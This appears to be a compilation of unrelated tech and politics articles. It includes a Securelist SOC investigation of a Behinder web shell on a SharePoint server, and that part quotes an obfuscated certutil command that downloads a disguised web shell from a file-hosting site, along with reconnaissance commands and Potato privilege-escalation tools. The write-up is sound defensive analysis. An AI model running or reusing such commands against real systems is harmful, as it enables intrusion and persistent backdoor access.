Money, status, or even survival – there’s no shortage of incentives for faking results in the scientific community. What can we do to prevent it, or at least make it noticeable? One possible solution is cryptographic signing of measurement results.

Here’s a proof-of-concept from [Clement Heyd] and [Arbion Halili]. They took a ThermoFisher Scientific 7500 Fast PCR (Polymerase Chain Reaction) machine, isolated its daughter-software, and confined it into a pipeline that automatically signs each result with help of a HSM (Hardware Security Module).

A many machines do, this one has to be paired to a PC, running bespoke software. This one’s running Windows XP, at least! The software got shoved into a heavily isolated virtual machine running XP, protected by TEE (Trusted Execution Environment). The software’s output is now piped into a data diode virtual serial port out of the VM, immediately signed with the HSM, and signed data is accessible through a read-only interface. Want to verify the results’ authenticity? Check them against the system’s public key, and you’re golden – in theory.

This design is just a part of the puzzle, given a typical chain of custody for samples in medical research, but it’s a solid start – and it happens to help make the Windows XP setup more resilient, too.

Wondering what PCR testing is good for? Tons of things all over the medical field, for instance, we’ve talked about PCR in a fair bit of detail in this article about COVID-19 testing. We’ve also covered a number of hacker-built PCR and PCR-enabling machines, from deceivingly simple to reasonably complex!

hackaday.com/2025/03/01/making…

Good morning! There's a bonus edition of Digital Politics this week. I'm Mark Scott, and I've spent the last six days assessing what to make of the recent German federal election on Feb 23.

Despite fears of record levels of foreign interference, the outcome was what almost everyone predicated. Already, some are claiming victory in the fight against online disinformation aimed at undermining the country's democratic institutions.

That would be a mistake. Below is a cross-post from my analysis for Tech Policy Press.

Let's get started:

Lessons from Germany's federal election

A week has passed since Germany’s federal election, and many are breathing a sigh of relief.

Friedrich Merz, a 69-year-old center-right politician, will almost certainly become the country’s next Chancellor, though a ruling coalition government — between Merz’s Christian Democrat Union (CDU) and the center-left Social Democratic Party (SDP) — won’t be formed until mid-April, at the earliest.

Alternative for Deutschland (AfD), a far-right party that garnered support from the likes of US Vice President JD Vance and Elon Musk, finished second in the election with just under 21 percent of the national vote. That party had found vocal support with younger, male voters, particularly in the Eastern parts of Germany, and had garnered significant traction across social media — particularly on Musk’s X, formerly known as Twitter.

Yet widespread fears around online election interference, either promoted by foreign countries like Russia or amplified by fringe domestic groups spreading conspiracy theories around alleged voter fraud or Germany’s supposed misguided support for Ukraine, did not materialize.

The result of Germany’s Feb 23 election was as many had predicted. The country’s vote now joins a growing list of national elections — including scores during 2024 in which more than two billion people voted globally — where close scrutiny from regulators, national security officials and outside researchers has discovered that foreign actors’ both overt and clandestine efforts to sway voters’ decisions proved less successful than first imagined.

Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com

Yet the relief now felt in Germany — that the country’s democratic institutions withstood what national officials and outsiders claimed were unprecedented levels of election-related foreign interference — is misplaced.

It fundamentally misunderstands that digital attacks on countries’ electoral processes can not be combatted solely during short election campaign cycles during which heightened attention is aimed at such malign actors. Instead, foreign adversaries and domestic groups that often amplify state-backed online propaganda are in this for the long haul — and their activities should be viewed over years, if not decades.

Why no one should claim 'mission accomplished'

Any claims — in Germany or other democratic countries — that national officials, tech companies and civil society groups were able to thwart digital interference attacks ahead of individual elections represent a false economy. For one, it’s almost impossible to link specific examples of online state-backed propaganda and covert influence campaigns to how voters cast ballots. For another, those online attacks don’t just stop because a country’s election cycle has come to an end.

Even as Merz’s CDU political party began haggling with the center-left SPD over a new coalition government, Russia’s state-backed media continued to sow dissent and division within Germany for its own political gain.

RT Deutschland — a Kremlin-back media organization that, while banned within the European Union, is still widely accessible in Germany — pumped out article after article about how the Feb 23 election was unjust; that the failure to include AfD in the coalition government was anti-democratic; and that Germany’s ongoing support for Ukraine represented unjustified war-mongering.

If promoted by domestic actors, such talking points would be legal under the country’s free speech rules. But they were instead amplified by a foreign state adversary whose Kremlin-backed media outlets have been sanctioned because of “disinformation and information manipulation against the EU and its member states.”

Under long-standing political norms dating back to the aftermath of World War Two, Germany’s mainstream political parties have created a so-called “firewall” in which politicians will not allow groups associated with extremist movements, including the AfD, to join coalition governments.

Vance, the US Vice President, recently criticized such practices in a speech in Munich. “Democracy rests on the sacred principle that the voice of the people matters,” he said. “There’s no room for firewalls.”

It’s not just foreign adversaries that have continued to cast doubt on Germany’s election — even after the outcome was a foregone conclusion.

Across multiple Telegram channels, some of which have hundreds of thousands of followers, domestic influencers have spread false claims about rigged ballots; accusations that Germany should not support Ukraine because of its alleged starting of the war with Russia; and allegations the CDU wants to outlaw the AfD. Those messages have been further amplified, primarily on X, where some have garnered attention from non-German social media users and have been picked up by Russia’s state media.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Again, none of these falsehoods are illegal under German law, and can not be removed by platforms under the EU’s Digital Services Act. But this slow dripping of inaccurate information — often within fringe social media communities where fact-checking does not exist — represents an ongoing threat to national democratic institutions, particularly when those domestic messages are further amplified by foreign adversaries.

Ahead of Germany’s Feb 23 election, the country’s officials held a so-called ‘stress test’ with the likes of Meta, TikTok, and X to war-game potential threats to the national vote. Klaus Müller, head of the national regulator in charge of the exercise, said his agency was “well prepared” to combat election-related problems. The European Commission also published advice for how national regulators should protect national elections.

Such efforts should not be prioritized for when countries hold elections.

In the ongoing whack-a-mole fight between national officials seeking to defend countries’ democratic institutions and foreign adversaries eager to undermine those norms via covert influence campaigns and outright online propaganda, it’s now a 24/7, 365-day battle — one that doesn’t just come to an end when the votes have all been counted.

digitalpolitics.co/newsletter0…

Nerf blasters typically fire small foam darts or little foam balls. [Michael Pick] wanted to build something altogether more devastating. To that end, he created a rocket launcher with an advanced air burst capability, intended to take out enemies behind cover.

Unlike Nerf’s own rocket launchers, this build doesn’t just launch a bigger foam dart. Instead, it launches an advanced smart projectile that releases lots of smaller foam submunitions at a set distance after firing.

The rocket launcher itself is assembled out of off-the-shelf pipe and 3D printed components. An Arduino Uno runs the show, hooked up to a Bluetooth module and a laser rangefinder. The rangefinder determines the distance to the target, and the Bluetooth module then communicates this to the rocket projectile itself so it knows when to release its foamy payload after launch. Releasing the submunitions is achieved with a small microservo in the projectile which opens a pair of doors in flight, scattering foam on anyone below. The rockets are actually fired via strong elastic bands, with an electronic servo-controlled firing mechanism.

We’ve featured some great Nerf builds over the years, like this rocket-blasting robot.

youtube.com/embed/umT7IicqUl4?…

hackaday.com/2025/03/01/buildi…

Mozilla ha modificato la sua politica sulla privacy, rimuovendo la promessa di non vendere mai i dati personali degli utenti di Firefox.

Il fatto

In precedenza nelle FAQ dell’azienda era la seguente : “No. Non l’abbiamo mai fatto e non lo faremo mai. E ti proteggiamo da molti degli inserzionisti che lo fanno. I prodotti Firefox sono progettati per proteggere la tua privacy. È una promessa.”

Ora questa è una dichiarazione scomparsa e la nuova sezione sulla privacy afferma che Mozilla non fa più promesse così ampie. L’azienda spiega questo fatto con il fatto che in alcune giurisdizioni il termine “vendita di dati” viene interpretato in modo troppo ampio.

Mozilla afferma che non vende i dati nel modo più usuale del termine ma è costretta a condividere alcune informazioni con i partner. L’azienda afferma che tali dati vengono resi anonimi, aggregati o elaborati tramite tecnologie che migliorano la privacy.

Gli utenti reagiscono: “Questo è inaccettabile”

A seguito dell’aggiornamento dei termini di servizio, gli utenti hanno espresso la loro insoddisfazione nelle discussioni su Guida in linea E Reddit . Erano particolarmente preoccupati per il punto, secondo cui Inserendo le proprie informazioni in Firefox, gli utenti concedono automaticamente all’azienda una licenza gratuita e mondiale per il loro utilizzo.

Mozilla sotto pressione da parte dei critici ha poi corretto la formulazione : i termini ora chiariscono che la licenza è richiesta solo per il funzionamento del browser e non conferisce all’azienda la proprietà dei contenuti dell’utente. Tuttavia, molti utenti sono rimasti insoddisfatti. Uno di loro notato : “Non si tratta di una questione di formulazione. Non possiamo pretendere dagli utenti diritti così ampi sui loro dati.”

Inoltre, Mozilla riconosce di condividere le parole chiave delle query di ricerca con i partner, compresi i dati sulla posizione, ma assicura che lo fa in forma anonima. L’azienda sottolinea che gli utenti possono disattivare questa funzione nelle impostazioni di Firefox.

Molti però non hanno creduto alle spiegazioni dell’azienda. Un utente ha risposto al commento di Mozilla: “Questa è una totale assurdità e lo sai. La funzionalità di base di un browser è caricare e visualizzare le pagine web.”

L'articolo Mozilla Ci Ripensa: Ora Può Vendere i Tuoi Dati Personali? proviene da il blog della sicurezza informatica.

Il mese scorso il Segretario alla Difesa degli Stati Uniti, Pete Hegseth, ha ordinato al Cyber ​​Command degli Stati Uniti di sospendere ogni pianificazione di operazioni contro la Russia, compresi gli attacchi informatici offensivi. Lo hanno riferito tre fonti a conoscenza della situazione.

Hegseth ha trasmesso l’ordine al capo del Cyber ​​Command, il generale Timothy Ho, che a sua volta lo ha trasmesso al direttore delle operazioni uscente, il maggiore generale dei Marines Ryan Heritage. Secondo le fonti , la decisione non riguarda la National Security Agency (NSA), di cui Ho è anche a capo, e il suo lavoro di intelligence sui segnali contro la Russia.
Generale Timothy D. Ho
La mossa rientra negli sforzi della Casa Bianca per normalizzare i rapporti con Mosca, dopo che gli Stati Uniti e i loro alleati hanno cercato di isolare il Cremlino a causa del conflitto con l’Ucraina. La scorsa settimana Trump ha incontrato Zelensky a Washington per firmare un accordo che garantirebbe agli Stati Uniti l’accesso alle risorse minerarie ucraine. Tuttavia, l’accordo fallì dopo un’accesa discussione nello Studio Ovale.

La durata dell’ordine di Hegseth rimane sconosciuta, ma il Cyber ​​Command è stato informato che le restrizioni rimarranno in vigore a tempo indeterminato. Heritage, conoscendo tutte le operazioni di comando, deve ora comunicare l’ordine alle unità appropriate, tra cui alla 16th Air Force Cyber ​​Command, responsabile delle operazioni digitali nell’area del Comando Europeo degli Stati Uniti.

Il Cyber ​​Command sta attualmente preparando un rapporto di valutazione dei rischi per Hegseth, che dovrebbe includere un elenco delle operazioni annullate e delle potenziali minacce provenienti dalla Russia.

Se le restrizioni si applicassero solo alle unità impegnate in operazioni informatiche contro Mosca, sarebbero colpite centinaia di specialisti della Cyber ​​National Mission Force e della Cyber ​​Mission Force. Tuttavia, se colpissero anche le unità di intelligence e gli analisti, allora ne risentirebbero migliaia di dipendenti, compresi gli specialisti della NSA.

L’ordine di Hegseth coincide con gli sforzi del Cyber ​​Command per intensificare gli sforzi contro i cartelli della droga messicani, otto dei quali sono stati recentemente designati dall’amministrazione Trump come organizzazioni terroristiche.

Alti funzionari della Casa Bianca chiedono un’azione militare aggressiva contro i cartelli per frenare il flusso di droga negli Stati Uniti.

L'articolo Stop Attacchi Informatici Contro la Russia! L’US Cyber Command è Stato Bloccato proviene da il blog della sicurezza informatica.

Nel mondo della tecnologia, pochi nomi evocano tanta nostalgia quanto Skype. Eppure, dopo due decenni di onorato servizio, Microsoft ha deciso di spegnere per sempre la piattaforma che ha rivoluzionato la comunicazione digitale nei primi anni 2000. A partire da maggio, Skype “non sarà più disponibile”, ha confermato l’azienda su X, invitando gli utenti a migrare su Microsoft Teams, il suo servizio di comunicazione in continua espansione.

Dall’innovazione alla dimenticanza

Skype è stato un pioniere, un software capace di abbattere i costi delle chiamate internazionali e di connettere il mondo con una semplicità fino ad allora inimmaginabile. Nato in Estonia nel 2003, il servizio si diffuse rapidamente, tanto da attirare l’attenzione di eBay, che lo acquistò nel 2005 per 2,6 miliardi di dollari. Tuttavia, il matrimonio tra l’e-commerce e la telefonia VoIP non funzionò, e nel 2009 eBay vendette la sua quota di maggioranza a un consorzio di investitori per 1,9 miliardi di dollari.

Nel 2011, Microsoft entrò in scena con un’acquisizione mastodontica: 8,5 miliardi di dollari in contanti per portare Skype nella propria scuderia. Una mossa che, all’epoca, sembrava destinata a consolidare la posizione di Redmond nel settore delle comunicazioni. Tuttavia, col passare degli anni, il marchio Skype ha iniziato a perdere appeal.

Cosa succederà agli utenti Skype?

Per chi ancora utilizza Skype, Microsoft ha previsto un periodo di transizione fino a maggio 2025. Gli utenti potranno trasferire contatti, cronologia chat e crediti direttamente su Teams, utilizzando le stesse credenziali. Inoltre, fino alla chiusura definitiva, Skype e Teams continueranno a essere interoperabili, permettendo agli utenti di comunicare tra loro indipendentemente dalla piattaforma scelta.

Chi non desidera passare a Teams potrà invece scaricare ed esportare la propria cronologia delle chat prima della chiusura. Per quanto riguarda gli abbonamenti a Skype e il credito telefonico, Microsoft garantirà il trasferimento su Teams, in modo da non penalizzare gli utenti che ancora utilizzano il servizio per chiamate internazionali.

Un declino annunciato

Nonostante un temporaneo rilancio durante la pandemia, quando videoconferenze e chiamate online divennero la norma, Skype ha dovuto affrontare una concorrenza spietata. Zoom, Google Meet, WebEx, Apple FaceTime e WhatsApp hanno gradualmente eroso il suo dominio, offrendo alternative più moderne e integrate con i rispettivi ecosistemi. Nel frattempo, Microsoft ha concentrato sempre più risorse su Teams, integrandolo con Microsoft 365 e puntando sul mercato aziendale.

La chiusura di Skype rappresenta la fine di un’era, ma anche una lezione importante: nel mondo della tecnologia, l’innovazione è una corsa senza fine, e persino i giganti possono finire nel dimenticatoio se non riescono ad adattarsi ai cambiamenti del mercato.

Per chi ha utilizzato Skype nei suoi anni d’oro, il suo addio segna un momento di nostalgia. Ma per Microsoft, questo è solo un altro passo verso un futuro in cui Teams è destinato a dominare il settore delle comunicazioni digitali.

L'articolo Skype Addio Per Sempre! Microsoft chiude il pioniere delle videocall dopo 20 anni di servizio proviene da il blog della sicurezza informatica.

Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.

Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.

Despite being able to be up to 3% Ni by weight, Odontarrhena was ruled out as a candidate itself due to its slow-growing nature and that it is invasive to the United States. The researchers are also looking into what soil amendments can best help this super Camelina sativa best achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.

Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle instead of just burying them will be a big benefit as well. If you want learn about a more notorious heavy metal, checkout our piece on the blessings and destruction wrought by lead.

youtube.com/embed/zYB-DlEtFdE?…

hackaday.com/2025/02/28/phytor…

Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.

The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.

Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.

[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.

We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!

[Thanks to Peter Quinn for the tip!]

hackaday.com/2025/02/28/buildi…

Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.

This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.

Onset

It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.

From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.

As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.

A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]

Aftermath

To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato

Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.

With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?

Identifying the threat

Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:

Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)

In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:

The “extraData” structure example

Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.

Uncovering modules and variants

By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:

Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample

Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames

Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:

Sample FC793D722738C7FCDFE8DED66C96495B relations on VT

Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.

Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.

The bigger picture

Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:

ASPX web shell side by side with .NET payload

Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.

Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.

For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.

Happy hunting and see you on the next mission!

YARA rule

rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}

Indicators of compromise

Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll

File paths

C:\ProgramData\DRM\
C:\Users\Default\Videos\

securelist.com/soc-files-web-s…

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…

hackaday.com/2025/02/28/a-diff…

If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.

The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.

[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.

We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.

youtube.com/embed/zz59e1wWyVc?…

[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]

hackaday.com/2025/02/28/cheap-…

Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.

This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.

There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.

We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.

youtube.com/embed/AwRup7wAijU?…

hackaday.com/2025/02/28/low-re…

The original locking wheel.
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.

And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.

The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.

A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.
The original modern-style court from a 1946 paten
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.

Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.

Higher Tech

Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.

This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.

youtube.com/embed/PWZOeM5jdjg?…

Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.

youtube.com/embed/e7KzPQrzY-c?…

Where’s the Hack?

Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.

A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.

youtube.com/embed/fBICDODmCPI?…

Who Knew?

You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.

If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.

Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.

hackaday.com/2025/02/28/tech-i…

This week, Hackaday’s Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

First up in the news, and there’s a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, we’re hiring, so come join us in the dungeon.

On What’s That Sound, Kristina didn’t get close at all, but at least had a guess this time. That’s okay, though, because nobody got it right! We’re still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.

